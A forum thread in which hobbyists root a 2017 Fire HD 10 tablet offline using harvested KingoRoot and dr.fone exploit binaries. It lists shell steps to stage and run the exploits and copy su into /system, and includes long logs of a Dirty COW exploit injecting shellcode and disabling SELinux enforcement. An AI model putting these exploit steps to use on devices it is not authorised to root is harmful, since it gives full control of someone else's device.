-- Given the widespread characterization of one-click rooting tools (like KingoRoot, dr.fone, etc.) as malware, I am worried it's "bad form" for me to be posting such binaries and scripts on this forum.
-- As shady as KingoRoot and dr.fone are, do they have IP rights (esp. the latter in this case) that I would be violating by posting these files here?
Check your PM.
retyre said:
As I wrote in the OP, this is confirmed working. That's not what I am worried about here. It's this:
-- Given the widespread characterization of one-click rooting tools (like KingoRoot, dr.fone, etc.) as malware, I am worried it's "bad form" for me to be posting such binaries and scripts on this forum.
-- As shady as KingoRoot and dr.fone are, do they have IP rights (esp. the latter in this case) that I would be violating by posting these files here?
Check your PM.
Click to expand...
Click to collapse
OK, thanks!
My bigger worry is that Amazon will grab these, and plug the holes faster
Btw, if the files have IP issues (or other ones ...), the most that'd happen is that the moderators here would just take it down.
The OP has been updated with all the steps and links to the required files. Please read the disclaimers before you begin.
retyre said:
The OP has been updated with all the steps and links to the required files. Please read the disclaimers before you begin.
Click to expand...
Click to collapse
Wow, you actually got direct links to dr.fone exploits, straight on their web site!!!
I am amazed that it's DirtyCow, it's been ages, I thought it got patched on Fires way back, in 2016.
Update:
Here is the most "official" link to SuperSu 2.82-SR5 :
https://download.chainfire.eu/1220/SuperSU/SR5-SuperSU-v2.82-SR5-20171001224502.zip
Any reason to use this SuperSu version vs the prior options?
bibikalka said:
Wow, you actually got direct links to dr.fone exploits, straight on their web site!!!
I am amazed that it's DirtyCow, it's been ages, I thought it got patched on Fires way back, in 2016.
Update:
Here is the most "official" link to SuperSu 2.82-SR5 :
https://download.chainfire.eu/1220/SuperSU/SR5-SuperSU-v2.82-SR5-20171001224502.zip
Any reason to use this SuperSu version vs the prior options?
Click to expand...
Click to collapse
Yes. URL snooping is part art, part science.
That's the flashable zip, not the apk. Do you have an official link to the apk? I searched, but couldn't locate one.
I thought we were using 2.79 because of the difficulty in replacing Kingo? That's not an issue here, and it updates successfully (does not report installation failed).
retyre said:
Yes. URL snooping is part art, part science.
That's the flashable zip, not the apk. Do you have an official link to the apk? I searched, but couldn't locate one.
I thought we were using 2.79 because of the difficulty in replacing Kingo? That's not an issue here, and it updates successfully (does not report installation failed).
Click to expand...
Click to collapse
Yes, correct, 2.79 did not complain about Kingo's su when replacing it. Btw, I was flashing 2.82 via FF, after patching it a bit. To get SuperSu.apk, you just need to unpack zip, and it'll be sitting there, in E:\tmp\SR5-SuperSU-v2.82-SR5-20171001224502\common (or whatever).
Btw, I've edited build.prop a bit, first to remove arm64 in abilong (this would enable the stock SuperSu to work in FF, without patching), and then to disable OTAs via the version number:
http://www.aftvnews.com/how-to-bloc...k-by-setting-a-custom-fire-os-version-number/
Once I enabled OTA (renaming apk_ back to apk), it promptly downloaded 17 or 18 apks, and updated the Amazon apps. Now, I am on FireOS 5.5., and it did not download 5.6, meaning the version number trick works fine. So it'll freeze the ROM, but will continue updating apps.
"Offline" rooting with Kingo
This method is not as offline as the method in the OP, but here's how you can perform a variant of "offline" rooting with Kingo. I will begin by mentioning that Kingo's files are not easily accessible to the user, so you will have to have these files handy before you begin. Sadly, these files can only be obtained while Kingo is doing online rooting. Most (but not all, from what I have seen thus far) of these files are in your AppData\Local\Kingosoft\Kingo Root\files folder, but with different names.
I figured out the actual file names by matching the file sizes in the \files folder on my PC with the files created by Kingo in /data/local/tmp on the tablet while the online Kingo rooting process is _ongoing_ (ls -al). As I mentioned earlier, not every file in /data/local/tmp is in \files, though (could be in other folders on the PC; I haven't looked yet). Following this post, I also did a hex dump of the traffic over USB, but nearly all of it was Kingo transferring its files to /data/local/tmp..
Why does this have to be done while the rooting is in progress? Because Kingo cleans up the /data/local/tmp directory after the rooting is complete. In other words, you will have to copy the files from /data/local/tmp to /sdcard before the rooting completes. If you can do that, these are the files you will obtain: KingoUser.apk, busybox, ddexe, debuggerd, kingo, kingo_1b90d7d01 (likely a copy of KingoUser.apk), kingorootname, mkdevsh, su, suarm64, supolicy, suv7, install-recovery.sh, and libsupol.so (emphasis added to denote the required files). Some information is here as well.
So, what's the best way to obtain these files at this point? Sadly, by rooting (again) with Kingo. (Since these files are not publicly available, I do not think it's right for me to upload them somewhere.) If you can get a hold of these files and save them off the tablet, your future Kingo rooting can be completely offline ... and _mucho_ simpler than the procedure currently in the OP.
Here's what you would do with the aforementioned files:
-- Do steps 4 and 5 in the OP.
-- Download the SuperSU 2.79 apk from here and copy it to /sdcard.
-- Copy all the files Kingo files to a folder on /sdcard (say, k).
-- Copy everything from /sdcard/k to /data/local/tmp:
Code:
cp /sdcard/k/* /data/local/tmp/
cd /data/local/tmp
ls -l
-- Change permissions to execute:
Code:
chmod 755 *
-- This is the actual rooting command:
Code:
./kingo
This should be done in less than a minute, after which you will be back at the shell prompt.
-- Test root:
Code:
su
-- Mount /system writable to check:
Code:
mount -w -o remount /system
-- Install SuperSU 2.79 to get around the "su binary occupied" issue with later SuperSU versions. You should see installation failed (as usual), but things should be fine after the reboot.
-- Set default access to Grant in SuperSU's settings.
I have tested this multiple times. Works every time. Like I said, much easier than the method currently in the OP, but with the added challenge of obtaining non-public rooting files.
How does Kingo root, you ask? The mkdevsh file in /data/local/tmp (it's not on the computer as far as I can tell) is the only script I could find. At this time, I do not know the exploit being used here; it appears to be significantly more efficient than the doctor's remedy, that's for sure. Anyone interested in reversing the "kingo" binary?
retyre said:
Why does this have to be done while the rooting is in progress? Because Kingo cleans up the /data/local/tmp directory after the rooting is complete. In other words, you will have to copy the files from /data/local/tmp to /sdcard before the rooting completes. If you can do that, these are the files you will obtain: KingoUser.apk, busybox, ddexe, debuggerd, kingo, kingo_1b90d7d01 (likely a copy of KingoUser.apk), kingorootname, mkdevsh, su, suarm64, supolicy, suv7, install-recovery.sh, libsupol.so. (The apk is not needed.) Some information is here as well.
...
-- This is the actual rooting command (I got this from here):
Code:
./kingo kingo
...
Click to expand...
Click to collapse
Do you think the 'su' above will end up in /system/xbin/su ? Or are those packed inside kingo executable?
Btw, I've studied dr.fone's exploit, and it's using 'su' by Chainfire, there is a text like this inside it.
I suspect these tools are recycling quite a bit of borrowed code, that's why they carefully clean up after they are done.
bibikalka said:
Do you think the 'su' above will end up in /system/xbin/su ? Or are those packed inside kingo executable?
Click to expand...
Click to collapse
IIRC, Kingo puts its su somewhere else (not in /system/xbin), hence the commands that follow. If I do this again (I guess I will; my test tablet doesn't know about Amendment VIII), I will look to see which su binary it's using.
retyre said:
IIRC, Kingo puts its su somewhere else (not in /system/xbin), hence the commands that follow. If I do this again (I guess I will; my test tablet doesn't know about Amendment VIII), I will look to see which su binary it's using.
Click to expand...
Click to collapse
OK, but would not SuperSu find whatever 'su' there is (left by Kingoroot), and update it? Why do you need to do it manually?
Code:
cp /data/local/tmp/su /system/xbin/
chmod 755 /system/xbin/su
I gotta say, it looks like Kingo is much more professional malware outfit , dr.fone appears very amateurish in that regard. But regardless, given how well the other Fires held up post-DirtyCow, the good exploits are becoming quite scarce.
bibikalka said:
OK, but would not SuperSu find whatever 'su' there is (left by Kingoroot), and update it? Why do you need to do it manually?
Code:
cp /data/local/tmp/su /system/xbin/
chmod 755 /system/xbin/su
I gotta say, it looks like Kingo is much more professional malware outfit , dr.fone appears very amateurish in that regard. But regardless, given how well the other Fires held up post-DirtyCow, the good exploits are becoming quite scarce.
Click to expand...
Click to collapse
Correct, SuperSU will find Kingo's su binary (in /sbin) and update it, so the manual copy is not needed. To answer your earlier question, Kingo uses the su binary from /data/local/tmp (but the "kingo" binary might well contain the same su). It looks like Kingo's su binary is the arm64 version, and the one from SuperSU is arm.
I am thinking the 2017 HD 10 may have multiple exploits. Clearly, dr.fone is using Dirty COW (and this memory exploit fails at times), but given the ease (and 100% success) with which Kingo is rooting, it may have found an easier exploit.
retyre said:
Correct, SuperSU will find Kingo's su binary (in /sbin) and update it, so the manual copy is not needed. To answer your earlier question, Kingo uses the su binary from /data/local/tmp (but the "kingo" binary might well contain the same su). It looks like Kingo's su binary is the arm64 version, and the one from SuperSU is arm.
I am thinking the 2017 HD 10 may have multiple exploits. Clearly, dr.fone is using Dirty COW (and this memory exploit fails at times), but given the ease (and 100% success) with which Kingo is rooting, it may have found an easier exploit.
Click to expand...
Click to collapse
For some reason, SuperSu could not install correctly the arm64 version of 'su'. What's in use after SuperSu is actually 'armv7'. I guess I did not try SR5-2.82 zip yet, perhaps, it'd work.
For the multiple exploits theory, it's interesting that Kingo also cannot root any other Fires right now, just this one (same as dr.fone). So either Fire HD10 2017 is choke full of old holes, or Kingo just has a more efficient DirtyCow implementation and does its thing quicker.
I am sort of hoping that with the upcoming OTA, Amazon would make FireOS a bit more like a proper 64 bit Android thinggy, without this hybrid stuff that's seems to be throwing off a lot of misc apps (such as FlashFire and Xposed).
has anyone tried the offline root on the 8? if not i am going to soon for sureeeee
Ae3NerdGod said:
has anyone tried the offline root on the 8? if not i am going to soon for sureeeee
Click to expand...
Click to collapse
I just tried the OP's offline root instructions 3 times on my Fire HD 8 running 5.6.0.0 and it failed all 3 times. Here's the error code if you are curious:
Code:
[HIDE]---try 1---
C:\android\platform-tools>adb shell
[email protected]:/ $ ls -l /data/local/tmp
-rwxr-xr-x shell shell 1126000 2017-11-13 17:41 busybox
[email protected]:/ $ cp /sdcard/c/* /data/local/tmp
[email protected]:/ $ cd /data/local/tmp
[email protected]:/data/local/tmp $ ls -l
-rw-rw---- shell shell 109400 2018-01-19 21:15 Matrix
-rw-rw---- shell shell 6488979 2018-01-19 21:15 Superuser.apk
-rwxr-xr-x shell shell 1126000 2017-11-13 17:41 busybox
-rw-rw---- shell shell 67 2018-01-19 21:15 ddexe
-rw-rw---- shell shell 1756 2018-01-19 21:15 debuggerd
-rw-rw---- shell shell 202824 2018-01-19 21:15 fileWork
-rw-rw---- shell shell 629 2018-01-19 21:15 install-recovery.sh
-rw-rw---- shell shell 13592 2018-01-19 21:15 pidof
-rw-rw---- shell shell 1912 2018-01-19 21:15 start_wssud.sh
-rw-rw---- shell shell 75348 2018-01-19 21:15 su
-rw-rw---- shell shell 108480 2018-01-19 21:15 su_arm64
-rw-rw---- shell shell 101852 2018-01-19 21:15 supolicy
-rw-rw---- shell shell 177316 2018-01-19 21:15 toolbox
-rw-rw---- shell shell 38830 2018-01-19 21:15 wsroot.sh
[email protected]:/data/local/tmp $ chmod 755 *
[email protected]:/data/local/tmp $ ls -l
-rwxr-xr-x shell shell 109400 2018-01-19 21:15 Matrix
-rwxr-xr-x shell shell 6488979 2018-01-19 21:15 Superuser.apk
-rwxr-xr-x shell shell 1126000 2017-11-13 17:41 busybox
-rwxr-xr-x shell shell 67 2018-01-19 21:15 ddexe
-rwxr-xr-x shell shell 1756 2018-01-19 21:15 debuggerd
-rwxr-xr-x shell shell 202824 2018-01-19 21:15 fileWork
-rwxr-xr-x shell shell 629 2018-01-19 21:15 install-recovery.sh
-rwxr-xr-x shell shell 13592 2018-01-19 21:15 pidof
-rwxr-xr-x shell shell 1912 2018-01-19 21:15 start_wssud.sh
-rwxr-xr-x shell shell 75348 2018-01-19 21:15 su
-rwxr-xr-x shell shell 108480 2018-01-19 21:15 su_arm64
-rwxr-xr-x shell shell 101852 2018-01-19 21:15 supolicy
-rwxr-xr-x shell shell 177316 2018-01-19 21:15 toolbox
-rwxr-xr-x shell shell 38830 2018-01-19 21:15 wsroot.sh
[email protected]:/data/local/tmp $ ./Matrix /data/local/tmp 2
<WSRoot><Command>0</Command></WSRoot>
<WSRoot><InitResource>0</InitResource></WSRoot>
Decrypt Success: /data/local/tmp/fileWork
Output File Name: /data/local/tmp/fileWork.
<WSRoot><Decrypt>0</Decrypt></WSRoot>
extracting: /data/local/tmp/Bridge_wsroot.sh
extracting: /data/local/tmp/krdirtyCow32
extracting: /data/local/tmp/krdirtyCow64
extracting: /data/local/tmp/libsupol.so
extracting: /data/local/tmp/my.sh
extracting: /data/local/tmp/mysupolicy
extracting: /data/local/tmp/patch_script.sh
extracting: /data/local/tmp/root3
<WSRoot><Decompression>0</Decompression></WSRoot>
execute string: /data/local/tmp/root3 /data/local/tmp/ 2
WARNING: linker: /data/local/tmp/root3: unused DT entry: type 0x6ffffffe arg 0x600
WARNING: linker: /data/local/tmp/root3: unused DT entry: type 0x6fffffff arg 0x1
ro.build.version.sdk :22
ro.product.cpu.abi :arm64-v8a
is x64
execute string: /data/local/tmp/krdirtyCow64 /data/local/tmp/ 2
WARNING: linker: /data/local/tmp/krdirtyCow64: unused DT entry: type 0x6ffffffe arg 0xd30
WARNING: linker: /data/local/tmp/krdirtyCow64: unused DT entry: type 0x6fffffff arg 0x1
path : /data/local/tmp/
path : /data/local/tmp
[*] path_script:/data/local/tmp/patch_script.sh /data/local/tmp
rm: /data/local/tmp/sepolicy: No such file or directory
rm: /data/local/tmp/load: No such file or directory
supolicy v2.76 (ndk:armeabi) - Copyright (C) 2014-2016 - Chainfire
Patching policy [/data/local/tmp/sepolicy] --> [/data/local/tmp/load] ...
-permissive:zygote=ok
-permissive:kernel=ok
-permissive:init=ok
-permissive:su=ok
-permissive:init_shell=ok
-permissive:shell=ok
-permissive:servicemanager=ok
- Success
find_opcode offset:2d0 opcode:aaffbbee
find ok star:7f9a42c008 end:7f9a42c2d8 size:2d0
sh : /data/local/tmp/my.sh /data/local/tmp 2 fwrite is count 209221 /data/local/tmp/load1
fwrite is count 54048 /data/local/tmp/load2
find_opcode offset:2b4 opcode:eaeaeaea
find_opcode offset:2b8 opcode:ebebebeb
find_opcode offset:22d opcode:abababab
load = 40465 load1 = 33145 load2 = d320
find_opcode offset:2b0 opcode:efefefef
find_opcode offset:24d opcode:cdcdcdcd
find_opcode offset:2bc opcode:acacacac
init_shellcode
loadsize:263269
loadpath:/data/local/tmp/load
shpath:/data/local/tmp/my.sh /data/local/tmp 2
shpath:2bc
open /proc
PID:188
find logd pid : bc
_inject_start_s:0x7f9a42c008
Copying /sepolicy to /data/local/tmp/cp_sepolicy
cow_exploit_mv_file_init: Overriding /sepolicy from /data/local/tmp/load1
size: 209221
[*] mmap 0x7f9a225000;
[*] exploit (patch)
[*] currently 0x7f9a225000=8f97cff8c
sched_setaffinity: Invalid argument[*] madvise = 0x7f9a225000 209221
checking the patch ... exploit
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
exit fork(), loop time more then 30s
<WSRoot><Exploit>0x00000332</Exploit></WSRoot>
check done
sched_setaffinity: Invalid argument<WSRoot><Exploit>0x00000382</Exploit></WSRoot>
FAIL : load1 --> /sepolicy
<WSRoot><Exploit>0x00000341</Exploit></WSRoot>
<WSRoot><Exploit>0x00000881</Exploit></WSRoot>
<WSRoot><Done>0x00000172</Done></WSRoot>
1|[email protected]:/data/local/tmp $ ls
Bridge_wsroot.sh
Matrix
Superuser.apk
busybox
cp_sepolicy
ddexe
debuggerd
fileWork
fileWork.
install-recovery.sh
krdirtyCow32
krdirtyCow64
libsupol.so
load
load1
load2
my.sh
mysupolicy
patch_script.sh
pidof
root3
sepolicy
start_wssud.sh
su
su_arm64
supolicy
toolbox
wsroot.sh
[email protected]:/data/local/tmp $ rm *
[email protected]:/data/local/tmp $ ls
[email protected]:/data/local/tmp $ exit
C:\android\platform-tools>adb reboot
---try 2---
C:\android\platform-tools>adb shell
[email protected]:/ $ cp /sdcard/c/* /data/local/tmp
[email protected]:/ $ cd /data/local/tmp
[email protected]:/data/local/tmp $ ls -l
-rw-rw---- shell shell 109400 2018-01-19 21:37 Matrix
-rw-rw---- shell shell 6488979 2018-01-19 21:37 Superuser.apk
-rw-rw---- shell shell 67 2018-01-19 21:37 ddexe
-rw-rw---- shell shell 1756 2018-01-19 21:37 debuggerd
-rw-rw---- shell shell 202824 2018-01-19 21:37 fileWork
-rw-rw---- shell shell 629 2018-01-19 21:37 install-recovery.sh
-rw-rw---- shell shell 13592 2018-01-19 21:37 pidof
-rw-rw---- shell shell 1912 2018-01-19 21:37 start_wssud.sh
-rw-rw---- shell shell 75348 2018-01-19 21:37 su
-rw-rw---- shell shell 108480 2018-01-19 21:37 su_arm64
-rw-rw---- shell shell 101852 2018-01-19 21:37 supolicy
-rw-rw---- shell shell 177316 2018-01-19 21:37 toolbox
-rw-rw---- shell shell 38830 2018-01-19 21:37 wsroot.sh
[email protected]:/data/local/tmp $ chmod 755 *
[email protected]:/data/local/tmp $ ./Matrix /data/local/tmp 2
<WSRoot><Command>0</Command></WSRoot>
<WSRoot><InitResource>0</InitResource></WSRoot>
Decrypt Success: /data/local/tmp/fileWork
Output File Name: /data/local/tmp/fileWork.
<WSRoot><Decrypt>0</Decrypt></WSRoot>
extracting: /data/local/tmp/Bridge_wsroot.sh
extracting: /data/local/tmp/krdirtyCow32
extracting: /data/local/tmp/krdirtyCow64
extracting: /data/local/tmp/libsupol.so
extracting: /data/local/tmp/my.sh
extracting: /data/local/tmp/mysupolicy
extracting: /data/local/tmp/patch_script.sh
extracting: /data/local/tmp/root3
<WSRoot><Decompression>0</Decompression></WSRoot>
execute string: /data/local/tmp/root3 /data/local/tmp/ 2
WARNING: linker: /data/local/tmp/root3: unused DT entry: type 0x6ffffffe arg 0x600
WARNING: linker: /data/local/tmp/root3: unused DT entry: type 0x6fffffff arg 0x1
ro.build.version.sdk :22
ro.product.cpu.abi :arm64-v8a
is x64
execute string: /data/local/tmp/krdirtyCow64 /data/local/tmp/ 2
WARNING: linker: /data/local/tmp/krdirtyCow64: unused DT entry: type 0x6ffffffe arg 0xd30
WARNING: linker: /data/local/tmp/krdirtyCow64: unused DT entry: type 0x6fffffff arg 0x1
path : /data/local/tmp/
path : /data/local/tmp
[*] path_script:/data/local/tmp/patch_script.sh /data/local/tmp
rm: /data/local/tmp/sepolicy: No such file or directory
rm: /data/local/tmp/load: No such file or directory
supolicy v2.76 (ndk:armeabi) - Copyright (C) 2014-2016 - Chainfire
Patching policy [/data/local/tmp/sepolicy] --> [/data/local/tmp/load] ...
-permissive:zygote=ok
-permissive:kernel=ok
-permissive:init=ok
-permissive:su=ok
-permissive:init_shell=ok
-permissive:shell=ok
-permissive:servicemanager=ok
- Success
find_opcode offset:2d0 opcode:aaffbbee
find ok star:7f7acc6008 end:7f7acc62d8 size:2d0
sh : /data/local/tmp/my.sh /data/local/tmp 2 fwrite is count 209221 /data/local/tmp/load1
fwrite is count 54048 /data/local/tmp/load2
find_opcode offset:2b4 opcode:eaeaeaea
find_opcode offset:2b8 opcode:ebebebeb
find_opcode offset:22d opcode:abababab
load = 40465 load1 = 33145 load2 = d320
find_opcode offset:2b0 opcode:efefefef
find_opcode offset:24d opcode:cdcdcdcd
find_opcode offset:2bc opcode:acacacac
init_shellcode
loadsize:263269
loadpath:/data/local/tmp/load
shpath:/data/local/tmp/my.sh /data/local/tmp 2
shpath:2bc
open /proc
PID:188
find logd pid : bc
_inject_start_s:0x7f7acc6008
Copying /sepolicy to /data/local/tmp/cp_sepolicy
cow_exploit_mv_file_init: Overriding /sepolicy from /data/local/tmp/load1
size: 209221
[*] mmap 0x7f7aabf000;
[*] exploit (patch)
[*] currently 0x7f7aabf000=8f97cff8c
sched_setaffinity: Invalid argument[*] madvise = 0x7f7aabf000 209221
checking the patch ... exploit
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
exit fork(), loop time more then 30s
<WSRoot><Exploit>0x00000332</Exploit></WSRoot>
check done
sched_setaffinity: Invalid argument<WSRoot><Exploit>0x00000382</Exploit></WSRoot>
FAIL : load1 --> /sepolicy
<WSRoot><Exploit>0x00000341</Exploit></WSRoot>
--- try 3 ---
C:\android\platform-tools>adb shell
[email protected]:/ $ cp /sdcard/c/* /data/local/tmp
[email protected]:/ $ cd /data/local/tmp
[email protected]:/data/local/tmp $ chmod 755 *
[email protected]:/data/local/tmp $ ./Matrix /data/local/tmp 2
<WSRoot><Command>0</Command></WSRoot>
<WSRoot><InitResource>0</InitResource></WSRoot>
Decrypt Success: /data/local/tmp/fileWork
Output File Name: /data/local/tmp/fileWork.
<WSRoot><Decrypt>0</Decrypt></WSRoot>
extracting: /data/local/tmp/Bridge_wsroot.sh
extracting: /data/local/tmp/krdirtyCow32
extracting: /data/local/tmp/krdirtyCow64
extracting: /data/local/tmp/libsupol.so
extracting: /data/local/tmp/my.sh
extracting: /data/local/tmp/mysupolicy
extracting: /data/local/tmp/patch_script.sh
extracting: /data/local/tmp/root3
<WSRoot><Decompression>0</Decompression></WSRoot>
execute string: /data/local/tmp/root3 /data/local/tmp/ 2
WARNING: linker: /data/local/tmp/root3: unused DT entry: type 0x6ffffffe arg 0x600
WARNING: linker: /data/local/tmp/root3: unused DT entry: type 0x6fffffff arg 0x1
ro.build.version.sdk :22
ro.product.cpu.abi :arm64-v8a
is x64
execute string: /data/local/tmp/krdirtyCow64 /data/local/tmp/ 2
WARNING: linker: /data/local/tmp/krdirtyCow64: unused DT entry: type 0x6ffffffe arg 0xd30
WARNING: linker: /data/local/tmp/krdirtyCow64: unused DT entry: type 0x6fffffff arg 0x1
path : /data/local/tmp/
path : /data/local/tmp
[*] path_script:/data/local/tmp/patch_script.sh /data/local/tmp
rm: /data/local/tmp/sepolicy: No such file or directory
rm: /data/local/tmp/load: No such file or directory
supolicy v2.76 (ndk:armeabi) - Copyright (C) 2014-2016 - Chainfire
Patching policy [/data/local/tmp/sepolicy] --> [/data/local/tmp/load] ...
-permissive:zygote=ok
-permissive:kernel=ok
-permissive:init=ok
-permissive:su=ok
-permissive:init_shell=ok
-permissive:shell=ok
-permissive:servicemanager=ok
- Success
find_opcode offset:2d0 opcode:aaffbbee
find ok star:7fa3584008 end:7fa35842d8 size:2d0
sh : /data/local/tmp/my.sh /data/local/tmp 2 fwrite is count 209221 /data/local/tmp/load1
fwrite is count 54048 /data/local/tmp/load2
find_opcode offset:2b4 opcode:eaeaeaea
find_opcode offset:2b8 opcode:ebebebeb
find_opcode offset:22d opcode:abababab
load = 40465 load1 = 33145 load2 = d320
find_opcode offset:2b0 opcode:efefefef
find_opcode offset:24d opcode:cdcdcdcd
find_opcode offset:2bc opcode:acacacac
init_shellcode
loadsize:263269
loadpath:/data/local/tmp/load
shpath:/data/local/tmp/my.sh /data/local/tmp 2
shpath:2bc
open /proc
PID:188
find logd pid : bc
_inject_start_s:0x7fa3584008
Copying /sepolicy to /data/local/tmp/cp_sepolicy
cow_exploit_mv_file_init: Overriding /sepolicy from /data/local/tmp/load1
size: 209221
[*] mmap 0x7fa337d000;
[*] exploit (patch)
[*] currently 0x7fa337d000=8f97cff8c
sched_setaffinity: Invalid argument[*] madvise = 0x7fa337d000 209221
checking the patch ... exploit
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
exit fork(), loop time more then 30s
<WSRoot><Exploit>0x00000332</Exploit></WSRoot>
check done
sched_setaffinity: Invalid argument<WSRoot><Exploit>0x00000382</Exploit></WSRoot>
FAIL : load1 --> /sepolicy
<WSRoot><Exploit>0x00000341</Exploit></WSRoot>[/HIDE]
got the same thing.
i even tried other dirtyc0w versions and compiling my own. do i need to use different files to overwrite on the HD 8?
and btw im running 5.3.3.0 FireOS kernel 3.18, should totally be vulnerable right OP?
any chance of helping us sort this out on the 8?
Ae3NerdGod said:
got the same thing.
i even tried other dirtyc0w versions and compiling my own. do i need to use different files to overwrite on the HD 8?
and btw im running 5.3.3.0 FireOS kernel 3.18, should totally be vulnerable right OP?
any chance of helping us sort this out on the 8?
Click to expand...
Click to collapse
The 2017 HD 10 is the only Fire tablet I have access to. These are the other exploits the doctor downloads (if the one in the OP fails; it usually doesn't fail on the 2017 HD 10, but one can manually delete files in /system to force it to fail): 6301805.zip, 21486085.zip, 1805PXN.zip, 7083636.zip.
Try each .zip, repeating the steps in the OP. See the OP for the output that should be generated when you execute the files in 20165195.zip.
Keep in mind that many of these CVE are years old and have been patched (or so they claim). For some reason, the 2017 HD 10 is still vulnerable.
Thanks for the post. I already rooted using the kingoroot method in the other thread, otherwise I would try this. One question though, after following that other root method I am stuck with having to set the supersu access mode to "Grant" which honestly bugs me. Had I followed your guide would I have been able to set the access mode to "Prompt"?
Oh one more thing, we cannot flash custom recovery on this device right? locked bootloader and all?